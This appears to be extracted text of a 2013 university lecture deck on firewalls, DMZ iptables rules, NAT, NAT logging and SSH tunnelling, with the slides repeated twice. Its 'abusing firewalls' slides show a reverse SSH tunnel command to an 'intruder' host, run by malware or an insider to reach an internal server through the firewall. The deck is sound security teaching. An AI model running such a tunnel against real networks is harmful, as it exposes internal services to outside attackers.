Focus on Security. Keeping the bad guys out

Focus on Security Keeping the bad guys out

3 ICT Security Topics: Day 1: General principles. Day 2: System hardening and integrity. Day 3: Keeping the bad guys out. Day 4: Seeing the invisible; what's passing through the wires? Day 5: Summary and conclusions.

4 ICT Security Today's topics: Firewalls: principles and implementation Network Address Translation (NAT) Abusing firewalls

5 Apply A Firewall Firewalls: Not a cure against all your problems. Is primarily useful to prevent attacks from the outside world aimed at our computers. But... Webbrowsing, email??

6 Apply A Firewall Firewalls: Every opening is a hole in the wall Viruses/Worms may leave through the hole; Malignant software may use encryption, and may thus be undistinguishable from `legal' traffic using encryption. Firewalls need maintenance. Who's doing that? Who has the knowledge to do so? Firewalls are bypassed when the user downloads the malware

7 Firewalls: Setup Terminology: Bastion Hosts DMZ Firewall Internal Network Multi homed host (Stateful) packet filtering

8 Firewalls: Setup Basic (Common) Setup:

9 Firewalls: Setup DMZ (Preferred) Setup: Firewall Setup Router Fire wall DMZ External Servers (DNS, Mail Web) Switch Internal Net Workstations Internal Servers (DNS, File, Mail)

10 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Internet to/from Internal net DMZ to/from Internal net Internet Internal Net DMZ

11 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

12 Firewalls: Setup DMZ Communication rules: Internet to/from Internal net No new inbound connections No new outbound connections if proxying is at all possible; otherwise be extremely cautious No forwarding Simple plain spoofing protection Internet Internal Net DMZ

13 Firewalls: Setup DMZ Communication rules: DMZ to/from Internal net No new connections from the DMZ to workstations New connections only to/from matching services Simple spoofing protection rules No forwarding Internet Internal Net DMZ

14 Firewalls: Implementation Iptables is used to implement the firewall Widely available Free software No special hardware required Can be used on a per host or organization level

15 Firewalls: Implementation Iptables installation and activation Installation: apt get install iptables Documentation: http://www.netfilter.org/documentation/howto/ Activation:./iptables /path/to/rules file The rules file is a simple text file This scheme is usually fine tuned

16 Firewalls: concepts What is input, output and forwarding? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT

17 Firewalls: concepts What is input, output and forwarding? Routing Decisions: INPUT or FORWARDING? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic what's the intended destination? INPUT Local Processes OUTPUT Incoming traffic is immediately separated between intended for this computer or not.

18 Firewalls: concepts What is input, output and forwarding? INPUT: Incoming Traffic Routing Decision FORWARDING Outgoing Traffic input decisions INPUT Local Processes OUTPUT Traffic entering the computer is intended for the computer itself. Verified at INPUT

19 Firewalls: concepts What is input, output and forwarding? OUTPUT Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT output decisions Traffic handled by local processes, is leaving the computer if verified by OUTPUT

20 Firewalls: concepts What is input, output and forwarding? FORWARDING Forwarding decisions Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT Traffic not intended for local processes is passing through, if verified by FORWARDING

21 Firewalls: Rules A simple (and not so desirable) initial file: P OUTPUT ACCEPT F OUTPUT Accept all output connections P INPUT ACCEPT F INPUT P FORWARD ACCEPT F FORWARD Accept all input connections Accept all forwarding connections No filtering of any kind. could be useful, though...

22 Firewalls: Rules Handling IPv6: /sbin/ip6tables flush /sbin/ip6tables delete chain /sbin/ip6tables P OUTPUT DROP /sbin/ip6tables P INPUT DROP /sbin/ip6tables P FORWARD DROP Drop output connections Drop input connections Drop forwarding connections

23 Firewalls: Setup DMZ Setup: Firewall Setup Router Fire wall DMZ Servers (smtp, http, https) Switch Internal Net Workstations

24 Firewalls: implementing the DMZ Recap: DMZ Communication rules Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

25 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT

26 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections A OUTPUT m state state RELATED,ESTABLISHED j ACCEPT

27 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Start the output rules with: P OUTPUT DENY F OUTPUT

28 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT

29 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding P FORWARD DENY F FORWARD

30 Firewalls: implementing the DMZ Internet to/from DMZ: the complete setup P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT P OUTPUT DENY F OUTPUT A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT P FORWARD DENY F FORWARD

31 Firewalls: implementing the DMZ If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf: net.ipv4.conf.default.rp_filter=1 net.ipv4.conf.all.rp_filter=1 net.ipv4.ip_forward=1 # spoofing protection # forward IP4 packets # what it says: net.ipv4.icmp_echo_ignore_broadcasts = 1

32 Network Address Translation Concepts: Source NAT the source address (i.e., where is the packed coming from) is modified. Just before the packet leaves the box: Postrouting. Example: masquerading Incoming Traffic Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

33 Network Address Translation Concepts: Destination NAT Incoming Traffic the destination address (i.e., where is the packed going to) is modified. Just before the routing decision is made: Prerouting. Example: port forwarding, proxying NAT: prerouting Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

34 Network Address Translation Source NAT: changing the address the packet is coming from, POST routing With POST routing the package leaves the router Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

35 Network Address Translation Source NAT (POST routing) application: computers behind a router in a private range information from these computers appear to come from the router. 192.168.x.y interface router Internet interface 192.168.x.y range Source NAT: 192.168.x.y. appears to be the router

36 Network Address Translation Source NAT (POST routing) application: t nat A POSTROUTING s 192.168.x.y/24 o eth0 j SNAT \ to source $routerip 192.168.x.y interface (eth1) router Internet interface (eth0) 192.168.x.y range Source NAT: 192.168.x.y. appears to be the router

37 Network Address Translation Destination NAT: changing the address the packet is going to, PRE routing. With PRE routing the package enters the router. Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

38 Network Address Translation Destination NAT (PRE routing) application: 192.168.x.y range computers behind a router information sent to the router is relayed to one of the computers in the private range trusted MTA router Internet interface 192.168.x.y interface 192.168.x.25 Destination NAT: 192.168.x.25 receives the mail

39 Network Address Translation Destination NAT (PRE routing) application: t nat A PREROUTING p tcp s $MTA IP d $routerip \ dport 25 j DNAT to destination 192.168.x.25 192.168.x.y range trusted MTA router Internet interface 192.168.x.y interface 192.168.x.25 Destination NAT: 192.168.x.25 receives the mail

40 Source NAT Logging NATLOG logs the network translations Actions performed by source nat translations: IPsrc:sport 192.168 range IPsrc:sport is translated by the firewall to IPfw:fwport; IPfw:fwport is used when communicating with IPdst:dport. 192.168.x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: 192.168.x.y. appears to be the origin

41 Source NAT Logging NATLOG logs the network translations Standard log facilities offer complex data NATLOG beautifies the logs from pcap library facilities looking at the interfaces information made available by conntrackd IPsrc:sport 192.168 range 192.168.x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: 192.168.x.y. appears to be the origin

42 Source NAT Logging NATLOG logs the network translations Two activation commands: natlog indevice outdevice (e.g. natlog eth1 eth0) natlog conntrack (requires conntrack installed) Syslog logs may be sent to a dedicated natlog.log :syslogtag, isequal, "NATLOG:" /var/log/natlog.log :syslogtag, isequal, "NATLOG:" ~ IPsrc:sport 192.168 range

43 Source NAT Logging NATLOG logs the network translations Examples of some log entries: Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28:049820 (UTC): 10.4.0.6:55359 (via: 129.125.100.246:55359) to 129.125.14.80:113 Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12:478988 until Jan 6 12:12:08:165852 (UTC): 192.168.19.72:3166 (via: 129.125.100.246:3166) to 173.194.66.138:80 IPsrc:sport 192.168 range

44 Firewalls and tunnels The concept Enter at one end Reappear at the other end

45 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol Often: ssh is used In real life firewalls allow at least some outgoing connections (http, https, smtp)

46 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Often: ssh is used. Connect to a remote computer's service, using a secure tunnel Allow remote computer's local connections to access a remote computer's service What this boils down to...

47 Firewalls and tunnels The situation: Workstation and Server (offering sensitive service at port 143, behind a firewall) Firewall accepts only traffic on ports 80 and 443 Trusted local area network Intruder (located outside the firewall) W (143) S Firewall: transfers ports 80, 443 I

48 Firewalls and tunnels The Intruder: (143) At the intruder an ssh daemon runs watching port 443 (e.g., sshd p 443) W S Firewall: transfers ports 80, 443 provides ssh-daemon watching port 443 I

49 Firewalls and tunnels Malware: At the workstation the shown ssh command is executed, using: W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: a virus transfers ports 80, 443 social engineering a disgruntled employee?... (443) I

50 Firewalls and tunnels Setting up the tunnel: Ssh connects through the firewall to port 443 at intruder W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 (443) I

51 Firewalls and tunnels (Ab)using the tunnel: A client at intruder connects using intruder's local port 1443 W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 (443) I

52 Firewalls and tunnels Tunnels: A secure tunnel is now established through the workstation, W allowing the accessor to use the server's service 143 directly. The firewall offers no protection. ssh -p 443 -R 1443:server:143 ssh -p 443 -R 1443:server:143 intruder intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 I (443)

53 Firewalls and tunnels Why tunneling Tunnels to secure inherently insecure protocols (pop, daytime,...) As a side effect: the hacker can use the tools too... Less serious applications: X11 tunneling (see the SSH documentation) Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

54 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:localhost:13 remote host forward connections from port 1313 at the local host

55 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:remote host:13 remote host forward connections from port 1313 at the local host to port 13 at remote host.

56 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. 2 nd Example: ssh L 1313:alternate host:13 remote host connect to port 13 at alternate host, succeeding if remote host allows us to connect to alternate host's port 13. The connection between localhost and remote host is secure. Not between remote host and alternate host. Note: Use g to access port 1313 from any host.

57 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (1): ssh L 1313:some host:13 remote host Connections to localhost:1313 are forwarded using ssh to remote host, and from there to somehost:13. some host may be remote host The g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!)

58 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (2): ssh remote host R 1234:some host:80 Connections from remote host:1234 to the computer issuing the ssh command are encrypted and from there forwarded to some host:80

59 Focus on Security Today's topics: Firewalls: principles and implementation Network Address Translation Abusing firewalls Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts They offer no protection against abuse caused by infections (possibly caused by users)

60 Focus on Security Day 4: Seeing the invisible The bottom line: tcpdump The applications: Wireshark OpenVAS

61 Focus on Security Keeping the bad guys out (?) dr. Frank B. Brokken Center of Information Technology University of Groningen 2013

Focus on Security Keeping the bad guys out

3 Topics: ICT Security Day 1: General principles. Day 2: System hardening and integrity. Day 3: Keeping the bad guys out. Day 4: Seeing the invisible; what's passing through the wires? Day 5: Summary and conclusions. Security is complex and extensive Only the highlights will be covered during this course Aims: increase awareness, show examples, present framework

4 ICT Security Today's topics: Firewalls: principles and implementation Network Address Translation (NAT) Abusing firewalls Security is complex and extensive Only the highlights will be covered during this course Aims: increase awareness, show examples, present framework

5 Apply A Firewall Firewalls: Not a cure against all your problems. Is primarily useful to prevent attacks from the outside world aimed at our computers. But... Webbrowsing, email??

6 Apply A Firewall Firewalls: Every opening is a hole in the wall Viruses/Worms may leave through the hole; Malignant software may use encryption, and may thus be undistinguishable from `legal' traffic using encryption. Firewalls need maintenance. Who's doing that? Who has the knowledge to do so? Firewalls are bypassed when the user downloads the malware

7 Firewalls: Setup Terminology: Bastion Hosts DMZ Firewall Internal Network Multi homed host (Stateful) packet filtering

8 Firewalls: Setup Basic (Common) Setup:

9 Firewalls: Setup DMZ (Preferred) Setup: Firewall Setup Router Fire wall DMZ External Servers (DNS, Mail Web) Switch Internal Net Workstations Internal Servers (DNS, File, Mail)

10 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Internet to/from Internal net DMZ to/from Internal net Internet Internal Net DMZ

11 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

12 Firewalls: Setup DMZ Communication rules: Internet to/from Internal net No new inbound connections No new outbound connections if proxying is at all possible; otherwise be extremely cautious No forwarding Simple plain spoofing protection Internet Internal Net DMZ

13 Firewalls: Setup DMZ Communication rules: DMZ to/from Internal net No new connections from the DMZ to workstations New connections only to/from matching services Simple spoofing protection rules No forwarding Internet Internal Net DMZ

14 Firewalls: Implementation Iptables is used to implement the firewall Widely available Free software No special hardware required Can be used on a per host or organization level

15 Firewalls: Implementation Iptables installation and activation Installation: apt get install iptables Documentation: http://www.netfilter.org/documentation/howto/ Activation:./iptables /path/to/rules file The rules file is a simple text file This scheme is usually fine tuned iptables save and iptables restore are usually called from /etc/init.d/iptables at startup to reinstall the firewall as soon as the computer boots. iptables save saves the contents of the iptables to cout. Incantation: iptables save > /var/lib/iptables/active (restore in, e.g., /etc/network/if pre up.d)

16 Firewalls: concepts What is input, output and forwarding? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT

17 Firewalls: concepts What is input, output and forwarding? Routing Decisions: INPUT or FORWARDING? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic what's the intended destination? INPUT Local Processes OUTPUT Incoming traffic is immediately separated between intended for this computer or not.

18 Firewalls: concepts What is input, output and forwarding? INPUT: Incoming Traffic Routing Decision FORWARDING Outgoing Traffic input decisions INPUT Local Processes OUTPUT Traffic entering the computer is intended for the computer itself. Verified at INPUT

19 Firewalls: concepts What is input, output and forwarding? OUTPUT Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT output decisions Traffic handled by local processes, is leaving the computer if verified by OUTPUT

20 Firewalls: concepts What is input, output and forwarding? FORWARDING Forwarding decisions Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT Traffic not intended for local processes is passing through, if verified by FORWARDING

21 Firewalls: Rules A simple (and not so desirable) initial file: P OUTPUT ACCEPT F OUTPUT Accept all output connections P INPUT ACCEPT F INPUT P FORWARD ACCEPT F FORWARD Accept all input connections Accept all forwarding connections No filtering of any kind. could be useful, though... as fall back to make visible what you're doing if you're not using a firewall

22 Firewalls: Rules Handling IPv6: /sbin/ip6tables flush /sbin/ip6tables delete chain /sbin/ip6tables P OUTPUT DROP /sbin/ip6tables P INPUT DROP /sbin/ip6tables P FORWARD DROP Drop output connections Drop input connections Drop forwarding connections

23 Firewalls: Setup DMZ Setup: Firewall Setup Router Fire wall DMZ Servers (smtp, http, https) Switch Internal Net Workstations

24 Firewalls: implementing the DMZ Recap: DMZ Communication rules Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

25 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT

26 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections A OUTPUT m state state RELATED,ESTABLISHED j ACCEPT

27 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Start the output rules with: P OUTPUT DENY F OUTPUT

28 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT

29 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding P FORWARD DENY F FORWARD

30 Firewalls: implementing the DMZ Internet to/from DMZ: the complete setup P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT P OUTPUT DENY F OUTPUT A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT P FORWARD DENY F FORWARD

31 Firewalls: implementing the DMZ If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf: net.ipv4.conf.default.rp_filter=1 net.ipv4.conf.all.rp_filter=1 net.ipv4.ip_forward=1 # spoofing protection # forward IP4 packets # what it says: net.ipv4.icmp_echo_ignore_broadcasts = 1

32 Network Address Translation Concepts: Source NAT Incoming Traffic the source address (i.e., where is the packed coming from) is modified. Just before the packet leaves the box: Postrouting. Example: masquerading Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

33 Network Address Translation Concepts: Destination NAT Incoming Traffic the destination address (i.e., where is the packed going to) is modified. Just before the routing decision is made: Prerouting. Example: port forwarding, proxying NAT: prerouting Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

34 Network Address Translation Source NAT: changing the address the packet is coming from, POST routing With POST routing the package leaves the router Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

35 Network Address Translation Source NAT (POST routing) application: computers behind a router in a private range information from these computers appear to come from the router. 192.168.x.y interface router Internet interface 192.168.x.y range Source NAT: 192.168.x.y. appears to be the router

36 Network Address Translation Source NAT (POST routing) application: t nat A POSTROUTING s 192.168.x.y/24 o eth0 j SNAT \ to source $routerip 192.168.x.y interface (eth1) router Internet interface (eth0) 192.168.x.y range Source NAT: 192.168.x.y. appears to be the router

37 Network Address Translation Destination NAT: changing the address the packet is going to, PRE routing. With PRE routing the package enters the router. Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

38 Network Address Translation Destination NAT (PRE routing) application: computers behind a router 192.168.x.y range information sent to the router is relayed to one of the computers in the private range trusted MTA router Internet interface 192.168.x.y interface 192.168.x.25 Destination NAT: 192.168.x.25 receives the mail

39 Network Address Translation Destination NAT (PRE routing) application: t nat A PREROUTING p tcp s $MTA IP d $routerip \ dport 25 j DNAT to destination 192.168.x.25 192.168.x.y range trusted MTA router Internet interface 192.168.x.y interface 192.168.x.25 Destination NAT: 192.168.x.25 receives the mail

40 Source NAT Logging NATLOG logs the network translations Actions performed by source nat translations: IPsrc:sport 192.168 range IPsrc:sport is translated by the firewall to IPfw:fwport; IPfw:fwport is used when communicating with IPdst:dport. 192.168.x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: 192.168.x.y. appears to be the origin

41 Source NAT Logging NATLOG logs the network translations Standard log facilities offer complex data NATLOG beautifies the logs from pcap library facilities looking at the interfaces information made available by conntrackd IPsrc:sport 192.168 range 192.168.x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: 192.168.x.y. appears to be the origin

42 Source NAT Logging NATLOG logs the network translations Two activation commands: natlog indevice outdevice (e.g. natlog eth1 eth0) natlog conntrack (requires conntrack installed) Syslog logs may be sent to a dedicated natlog.log :syslogtag, isequal, "NATLOG:" /var/log/natlog.log :syslogtag, isequal, "NATLOG:" ~ IPsrc:sport 192.168 range

43 Source NAT Logging NATLOG logs the network translations Examples of some log entries: Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28:049820 (UTC): 10.4.0.6:55359 (via: 129.125.100.246:55359) to 129.125.14.80:113 Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12:478988 until Jan 6 12:12:08:165852 (UTC): 192.168.19.72:3166 (via: 129.125.100.246:3166) to 173.194.66.138:80 IPsrc:sport 192.168 range

44 Firewalls and tunnels The concept Enter at one end Reappear at the other end

45 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol Often: ssh is used In real life firewalls allow at least some outgoing connections (http, https, smtp)

46 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Often: ssh is used. Connect to a remote computer's service, using a secure tunnel Allow remote computer's local connections to access a remote computer's service What this boils down to...

47 Firewalls and tunnels The situation: Workstation and Server (offering sensitive service at port 143, behind a firewall) Firewall accepts only traffic on ports 80 and 443 Trusted local area network Intruder (located outside the firewall) W (143) S Firewall: transfers ports 80, 443 I

48 Firewalls and tunnels The Intruder: (143) At the intruder an ssh daemon runs watching port 443 (e.g., sshd p 443) W S Firewall: transfers ports 80, 443 provides ssh-daemon watching port 443 I

49 Firewalls and tunnels Malware: At the workstation the shown ssh command is executed, using: a virus social engineering a disgruntled employee?... W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 I (443)

50 Firewalls and tunnels Setting up the tunnel: Ssh connects through the firewall to port 443 at intruder W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 (443) I

51 Firewalls and tunnels (Ab)using the tunnel: A client at intruder connects using intruder's local port 1443 W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 (443) I

52 Firewalls and tunnels Tunnels: A secure tunnel is now established through the workstation, W allowing the accessor to use the server's service 143 directly. The firewall offers no protection. client connecting to local port 1443 ssh -p 443 -R 1443:server:143 ssh -p 443 -R 1443:server:143 intruder intruder (143) S Firewall: transfers ports 80, 443 I (443)

53 Firewalls and tunnels Why tunneling Tunnels to secure inherently insecure protocols (pop, daytime,...) As a side effect: the hacker can use the tools too... Less serious applications: X11 tunneling (see the SSH documentation) Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

54 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:localhost:13 remote host forward connections from port 1313 at the local host

55 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:remote host:13 remote host forward connections from port 1313 at the local host to port 13 at remote host.

56 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. 2 nd Example: ssh L 1313:alternate host:13 remote host connect to port 13 at alternate host, succeeding if remote host allows us to connect to alternate host's port 13. The connection between localhost and remote host is secure. Not between remote host and alternate host. Note: Use g to access port 1313 from any host.

57 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (1): ssh L 1313:some host:13 remote host Connections to localhost:1313 are forwarded using ssh to remote host, and from there to somehost:13. some host may be remote host The g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!)

58 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (2): ssh remote host R 1234:some host:80 Connections from remote host:1234 to the computer issuing the ssh command are encrypted and from there forwarded to some host:80

59 Focus on Security Today's topics: Firewalls: principles and implementation Network Address Translation Abusing firewalls Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts They offer no protection against abuse caused by infections (possibly caused by users)

60 Focus on Security Day 4: Seeing the invisible The bottom line: tcpdump The applications: Wireshark OpenVAS

61 Focus on Security Keeping the bad guys out (?) dr. Frank B. Brokken Center of Information Technology University of Groningen 2013